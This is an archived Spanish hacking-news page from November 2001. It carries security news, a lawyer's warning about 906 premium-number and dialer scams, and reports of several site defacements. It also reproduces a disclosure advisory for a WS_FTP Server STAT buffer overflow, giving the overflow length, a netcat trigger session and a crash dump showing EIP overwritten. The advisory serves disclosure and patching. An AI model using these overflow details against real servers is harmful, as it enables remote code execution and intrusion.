Noviembre 2001

Nace la A.I.H
Noticia enviada el Miércoles 28 de Noviembre de 2001 por alex

Ya ha nacido la Asociación para la Información de Hackers

¿ Quiénes son los miembros de la AIH?

Los miembros de la A.I.H. somos Generación X, aquella generación de gente joven que perdió la esperanza ante la idiosincrasia y el malestar mundial. No había futuro, ni sigue habiéndolo. Las cosas empeoran... Y, por eso, los seis que componemos esta asociación, treintañeros en su mayoría, nos hemos echado al monte con las ideas muy claras. Si hubiéramos nacido en otra época probablemente seríamos bandoleros de Curro Jiménez o llevaríamos unas mallas verdes y cantaríamos por los bosques de Sherwood. Pero hemos nacido en el siglo XX y somos hackers. [..]

Y darle las gracias a Carlos Mesa (presidente de la A.I.H) por todo su apoyo prestado a elhacker.net.

Os aventuro que habrán futuras colaboraciones entre la A.I.H y elhacker.net


Expertos aconsejan no dormir cerca de un teléfono móvil
Noticia enviada el Lunes 26 de Noviembre de 2001 por alex

Expertos en ondas electromagnéticas incidieron ayer en que los efectos nocivos sobre la salud no están demostrados, pero se pueden producir a largo plazo. Los mismo expertos afirmaron que hay un componente psicosomático en su influencia y que no suelen detectar radiaciones por encima del límite establecido ne la Ley. La mesa redonda ‘Ondas electromagnéticas y salud’, que fue emitida a través de internet, clausuró la iniciativa ‘la Rioja en onda’. Mercedes Martínez Burlado, jefa del departamento de Radiación Electromagnética del Instituto Torres Quevedo, recomendó «usar el móvil en espacios abiertos, sin apoyarse en paredes , no acercarse el teléfono al oído hasta que contesten y n o dejarlo cerca mientras se duerme». También informó de que los efectos nocivos «todavía no están demostrados».

Fuente: Elcorreodigital.com y DelitosInformaticos.com


Todo lo que usted quiso saber de los 906 pero nunca se atrevió a preguntar
Noticia enviada el Domingo 25 de Noviembre de 2001 por alex

Antonio García, mediana edad, Auxiliar Administrativo y con buena presencia, se encuentra en paro desde hace unas semanas, algo que no es de extrañar en los tiempos que corren. Hoy ha comprado el periódico para buscar un buen trabajo, decidiéndose a llamar a un anuncio en el que le ofrecen un puesto como dependiente. El número al que debe llamar es 90 643 51 16 (ficticio). Al otro lado del hilo se encuentra una señorita, muy amable, que comienza a hacerle preguntas tales como su Nombre, domicilio, estado civil, y demás datos personales y profesionales.

Ni que decir tiene que la conversación se dilata durante unos diez minutos, desconociendo el pobre Antonio que está llamando a un 906, es decir, una llamada mucho mas cara que las convencionales cuyo importe se va a embolsar el titular de la línea y la operadora de telecomunicaciones que de ese servicio.


Esa misma tarde, Antonio García se conecta a Internet desde su casa. Al principio consulta webs donde se ofrecen trabajos, pero a medida que va navegando se distrae y acaba en una web de contenido erótico. Le ofrecen un servicio para ver videos "políticamente incorrectos" gratis y, Antonio, que siempre ha mostrado cierta debilidad por esos asuntos, se baja (download) un programa para visionar dichos videos.

Desconoce, una vez más, nuestro protagonista que ese programa que acaba de instalar en su ordenador (o bien, que se instala automáticamente) le va a modificar la configuración del Acceso telefónico a redes, por lo que la próxima vez que se conecte a Internet, el número al que va a llamar será un 906, (y no el habitual, o sea un número local, o bien de tarifa plana) por lo que la factura de teléfono será bastante más elevada de la que está acostumbrado a pagar.


Pero no queda ahí la cosa, esa noche nuestro amigo Antonio se sienta tranquilamente en el sofá, conecta la TV y comienza a ver uno de esos programas de entretenimiento. La pregunta de hoy es : ¿Son ciertos los rumores de que Eva Sannun ha dejado al Príncipe Felipe por Dinio?. Antonio García sabe, a ciencia cierta que no son ciertos, así que decide mandar un SMS (Short Message System, o Mensaje de texto) al número que aparece en pantalla,

Una vez más, Antonio no lee la letra pequeña, por lo que no se da cuenta que ese pequeño mensaje le va a costar, aproximadamente, cinco veces más que el mensaje que le suele mandar todas las mañanas a su novia Lola dándole los buenos días.


Estos son varios ejemplos de los usos y abusos que se están produciendo últimamente con los números 900, siendo la intención de este servidor poner sobre aviso a los consumidores / usuarios, que, como Antonio García, hacen uso de dichos servicios.


Así, con relación a las ofertas de trabajo que remiten a un "906", (una de las estafas más frecuentes), obvia decir que, en su mayoría, se tratan de ofertas inexistentes, siendo el único fin de los anunciantes sacar dinero de las llamadas de los aspirantes, de ahí que quienes están al otro lado del hilo telefónico intenten que estas duren el máximo de tiempo posible, como le ocurrió a Antonio García.

Ahora bien, ¿son todas las ofertas de empleo que remiten a un 906 una estafa? , esto es difícil de determinar, si bien cabría dar unos consejos:

En primer lugar, hacerle saber a Antonio García, que la próxima vez se asegure de la solvencia de la oferta, así como, en el caso de que decida llamar, no dilate la llamada por mucho tiempo.

Por otro lado, una media preventiva sería que las empresas, periódicos, webs, que den publicidad de ofertas de empleo, no acepten la inserción de anuncios de ofertas laborales cuyo teléfono de contacto sea un 906, o al menos se aseguren de la buena fe del anunciante ya que, una oferta de trabajo tiene que ser tan interesante para el trabajador como para el empresario, algo que falta en el caso que estamos analizando.


En lo que respecta al segundo asunto, que hemos tocado, la estafa en Internet, lo que Antonio García desconocía era que algunas páginas web hacen que los internautas se desconecten de su servidor habitual y llamen a un número 906, sin explicarle claramente cuánto les va a costar o incluso asegurándole que le ofrecen contenidos gratis.

Aparte del consejo de desconfiar de cualquier servicio "gratuito" que se de a través de Internet y que sería de pago en el mundo "real", sería interesante que, aquellos afectados por este tipo de comportamientos, denuncien los mismos ante las Asociaciones de Consumidores.

El Ministerio de Ciencia y Tecnología ha tomado cartas en el asunto a fin de evitar que este tipo de conductas proliferen; por un lado, a través de la creación de una comisión encargada de supervisar el uso de estos números, y por otro, con la elaboración de un código de conducta obligatorio para todas las empresas que presten servicios de este tipo y que afectará especialmente a las páginas web que utilizan la conexión a través de números 906 como medio de pago.

Finalmente, con relación a los SMS de los concursos televisivos, desconocía nuestro protagonista, Antonio García, que el coste de esos mensajes eran cinco veces superiores que el de un mensaje normal, de modo que si el envío de un mensaje estándar cuesta 25 pesetas, los mensajes de móviles a los programas de televisión alcanzan las 68, las 100 e incluso las 150 pesetas.

Como ocurre en los casos anteriores, la información que se le da al consumidor/usuario es escasa, nula o en letra pequeña en la pantalla del televisor, lo que provoca que muchos usuarios, como Antonio García, que han participado en votaciones o concursos de este tipo se lleven las manos a la cabeza cuando reciben la factura del móvil, por lo que, lo único que cabe aconsejar a los usuarios/concursantes es no envíen este tipo de mensajes si desconocen los costes.


En espera de haberles sido de ayuda, se despide atentamente… Antonio García.

Juan José Aragüez Guerrero
Abogado especialista Derecho Nuevas Tecnologías

e-derecho@teleline.es

Fuente del artículo Delitos Informaticos


Excelente Manual Firewall Tiny
Noticia enviada el Domingo 25 de Noviembre de 2001 por
alex

Navegando por internés, me he encontrado con un estupendo manual on-line en español del firewall gratuito Tiny.

Explica como configurar las reglas, consejos, trucos, descargas, problema comunes, etc.

Visitar Web del Manual


Bleem cierra
Noticia enviada el Viernes 23 de Noviembre de 2001 por alex

El emulador de la PlayStations Bleem cierra. Imagino que por las constantes presiones de Sony.....

Sólo hay que ver la web de Bleem


Vulnerabilidades en Sendmail 8.12.0 y previas
Noticia enviada el Jueves 22 de Noviembre de 2001 por alex

Jesús Cea Avión 20-11-2001

Las versiones de Sendmail previas a la 8.12.1 contienen dos vulnerabilidades que permiten que un usuario local acceda a la cola de correo del servidor.

También permite que bajo ciertas circunstancias y sistemas operativos, Sendmail no libere privilegios y siga ejecutándose con un nivel de acceso innecesariamente elevado

Sendmail 8.12.0 y previos contienen una vulnerabilidad que permite que un usuario malicioso local acceda a la cola de correo del servidor (donde se almacenan los mensajes que están entrando, y los mensajes salientes que todavía no se han transferido a su siguiente paso de la cadena). Si un usuario local fuerza un reprocesamiento de la cola de correo con un contador de saltos manipulado, por ejemplo, conseguirá que los mensajes en la cola que hayan superado el número de saltos manipulado sean eliminados del sistema.

Se crea, por tanto, la posibilidad de un ataque de denegación de servicio (DoS) y pérdida de información debida a la expiración provocada de mensajes de correo electrónico

Se recomienda a los usuarios de Sendmail que actualicen a la versión 8.12.1

Fuente de la noticia

Bajar Versión Parcheada (Última versión 8.11.6)


PlayBoy hackeada....
Noticia enviada el Miércoles 21 de Noviembre de 2001 por alex

los administradores de la red notaron una actividad inusitada en sus servidores, dijo la portavoz de Playboy.com, Laura Sigman

Playboy.com está tratando de determinar cuántos clientes pudieron verse afectados y contrataron una empresa de seguridad de computadoras para auditar los sistemas, informó.

La carta dijo que el "grupo pirata shader" había tenido acceso completo a la red de Playboy.com desde 1998.

El correo electrónico también mostró una lista de una cantidad de advertencias a los clientes y compañías online, incluido "no confíen en empresas que tienen tus detalles online".

Fuente de la noticia


Has jugado algun juego que simule la accion de un hacker?
Noticia enviada el Miércoles 21 de Noviembre de 2001 por alex

En esta web tiene la solución. Es una demo pero tiene buena pinta....

Ver Pantallas


LinuxPreview.org hackeada
Noticia enviada el Martes 20 de Noviembre de 2001 por alex

Se puede leer el mensaje:

"The server hosting LinuxPreview and the sites of LinuxAlliance has been cracked. These sites will be restored within a few days."

Visitar


La XBOX se cuelga!!!!!!!!!
Noticia enviada el Domingo 18 de Noviembre de 2001 por alex

La xBox es de Microsoft, y a veces se cuelga xDDD

Ver XBox colgada
(se admiten risas)


Parche Seguridad IExplorer 5.5 y IExplorer 6.0
Noticia enviada el Jueves 15 de Noviembre de 2001 por alex

This update resolves the "Cookie Data in IE Can Be Exposed or Altered Through Script Injection" security vulnerability in Internet Explorer 6.0

System Requirements
This update applies to:

Internet Explorer 6.0
Internet Explorer 5.5 Service Pack 2

Parche Español para el 6.0

Parche Español para el 5.5 con Service Pack 2


Estados Unidos teme la vulnerabilidad de Internet
Noticia enviada el Miércoles 14 de Noviembre de 2001 por alex

''Nuestros enemigos utilizarán nuestra tecnología contra nosotros. Puede que no sean capaces de construirla, pero sí son capaces de entenderla''. Estas son palabras de Richard Clarke, consejero del presidente George W. Bush en materia de seguridad en el ciberespacio.
Las manifestaciones de Clarke no hacen sino confirmar lo que muchos en la industria se estaban temiendo: el Gobierno se está poniendo más y más nervioso ante la innegable vulnerabilidad de la Red y está rogando a las compañías tecnológicas que dediquen más fondos para tapar los supuestos ''agujeros'' de seguridad de Internet.

''Nuestra infraestructura de telecomunicaciones es frágil, porque cuando la construimos no teníamos planeado lo que iba a ser capaz de hacer en el futuro'', ha explicado Clarke en el transcurso de una reciente conferencia organizada por Microsoft en Palo Alto (California). En este sentido, el consejero ha criticado a los líderes del sector por la falta de recursos que dedican a la seguridad.

Origen: La Vanguardia Digital


Grave falla de seguridad en los exploradores de red de Microsoft
Noticia enviada el Miércoles 14 de Noviembre de 2001 por ElLenteJa

Microsoft ha reconocido que las dos versiones más recientes de su explorador de red tienen una vulnerabilidad de seguridad que puede permitir que intrusos cibernéticos se lleven la información personal de un usuario que sitios de Internet almacenan en las llamadas "cookies" (galletas) guardadas en los discos duros de quienes visitan los sitios.
En un boletín de seguridad fechado el día 8, Microsoft clasifica la falla como una de "alto riesgo" y recomienda que los usuarios cambien los ajustes de seguridad del explorador de red y de los programas de correo electrónico hasta que la empresa pueda confeccionar un parche para el programa.
Oficialmente, Microsoft verificó la existencia de la falla en el explorador de red 5.5 (con el "service pack" 2 instalado) y el explorador de red 6. La empresa dice que no comprobó si la falla afecta versiones anteriores porque la empresa les ha retirado su respaldo.

Origen: CNN en Español


Liberado 0ri0n E-Zine #3
Noticia enviada el Martes 6 de Noviembre de 2001 por alex

Revista Electrónica, la cual esta edición esta compuesta por: Mi Amigo el Unicode/Decode, Guía de Virus Macro Word, Como programar en C en muchos pasos (III), Manejando SQL (II Parte), Programación en PHP/MySQL, Guía de Gusanos VBS, Escribiendo exploits basados en Buffer OverFlow, Software Libre, Tutorial para el Principiante en TCL, Montando un Proxy con Squid, Seguridad en Tarjetas de Crédito Visa, Tutorial de Iptables, DVD's, Entre otros.

Esta Puede ser bajada de aquí

Visitar Web 0ri0n Team Venezuela


Hacking al perro-robot de Sony
Noticia enviada el Martes 6 de Noviembre de 2001 por tr0n

Sony solicita a un hacker (programador experto) que retire de Internet sus programas gratuitos para modificar los comportamientos y añadir nuevas funcionalidades al perro-robot Aibo. La decisión de Sony ha provocado una campaña protesta en la comunidad de seguidores de Aibo que están retirando sus páginas webs dedicadas a esta cibermascota, además de recomendar a los usuarios que dejen de comprarlo.


En una carta dirigida al hacker y firmada por Victor Matsuda, vicepresidente de Entertainment Robot America, división de Sony Electronics Inc., se solicita la retirada de contenidos del sitio web al entender que se está violando el copyright de los programas de Sony, se proporcionan mecanismos para burlar la protección del protocolo AIBO Memory Stick, y se distribuyen programas que parecen haber sido creados tras descompilar y descifrar software propietario
de Sony.



fuente de la noticia


Exploit del WS_FTP Server
Noticia enviada el Lunes 5 de Noviembre de 2001 por alex

- ---------------------------------------
Defcom Labs Advisory def-2001-31

WS_FTP server 2.0.3 Buffer Overflow

Author: Andreas Junestam
Co-Author: Janne Sarendal
Release Date: 2001-10-05
=----------------=[Brief Description]=-------------------------
WS_FTP server 2.0.3 contains a buffer overflow which affects the
STAT command. This buffer overflow gives an attacker the ability to
run code on the target with SYSTEM RIGHTS, due to the fact that the
server runs as a service by default.

- ------------=[Affected Systems]=--------------------------
- - WS_FTP server 2.0.3 and possibly earlier versions

- ----------=[Detailed Description]=------------------
* Command Buffer Overrun
The parsing code for the STAT command suffers from a buffer
overflow. By sending a STAT command followed by an argument greater
than 479 (475 bytes + new return address) bytes, a buffer will
overflow and the EIP will be overwritten. The overflow is dependant
on the size of the name of the server because the argument, the
servername and some more information is wsprint'ed together in the
buffer. A proof-of-concept exploit is attached to the advisory.

C:\tools\web>nc localhost 21
220-helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
220-Wed Aug 08 19:57:40 2001
220-30 days remaining on evaluation.
220 helig X2 WS_FTP Server 2.0.3.EVAL (35565717)
user ftp
331 Password required
pass ftp
230 user logged in
stat
// Ahora muchas "AAAAAAAAAAAAAAAA"
0808 19:57:40 (000002e8) 127.0.0.1:1131 connected to 127.0.0.1:21
SetFolder = C:\program\iFtpSvc\helig
SetFolder = C:\program\iFtpSvc\helig\public
SetFolder = C:/program/iFtpSvc/helig
0808 19:57:43 (000002e8) helig S(0) 127.0.0.1 anon-ftp logon
success
(A1)
Access violation - code c0000005 (first chance)
eax=000000ea ebx=0067c280 ecx=000000ea edx=00000002
esi=0067c280 edi=00130178
eip=41414141 esp=0104ded4 ebp=41414141 iopl=0
41414141 ?? ???

- ----------------=[Workaround]=--------------------- -
Download new version(2.0.4) from:
http://www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html

- ------------------=[Exploit]=------------------------------
See attached file, ws_ftp2.pl

- --------------[Vendor Response]=-----------------------
This issue was brought to the vendors attention on the 8th of
August, 2001. Patch is released.

Gracias a Cyrano por la info.

Heineken Team


Webs Intersantes
Noticia enviada el Lunes 5 de Noviembre de 2001 por alex

Configurar Router ADSL 3Com812
Ver Web

Configurar Servidor de Correo, Servidor Web, Codigo Activación del XP, etc
Ver Web


BandaAncha.st vuelve a estar on-line
Noticia enviada el Lunes 5 de Noviembre de 2001 por alex

BandaAncha.st vuelve a estar online después de un par de días.

Y ya son más de 4750 usuarios registrados con más de 380 mil páginas vistas el mes pasado.

Visitar BandaAncha.st


SoloLinux.com Hackeada.
Noticia enviada el Domingo 4 de Noviembre de 2001 por alex

SoloLinux.com ha sido hackeada y han dejado el siguiente mensaje:

"hack by sENsE of MNS !! greetz: Tw34k, Twinkle, D-Force, Data cha0s, nu|l !! mnssecure@hotmail.com ! irc.rizenet.org #mns "

La web ya ha sido re-establecida a la normalidad.
Ver SoloLinux.com


Una patente registrada complica los servicios web de los titanes tecnológicos
Noticia enviada el Jueves 1 de Noviembre de 2001 por tr0n

"Una patente propiedad de un programador poco conocido de Nueva Jersey puede complicar, al menos temporalmente, los grandes objetivos de los servicios web desplegados por titanes como IBM, Microsoft o Sun Microsystems."


jejejejeje se repite lo de David y Goliat ;-)


Noticia completa: ZDnet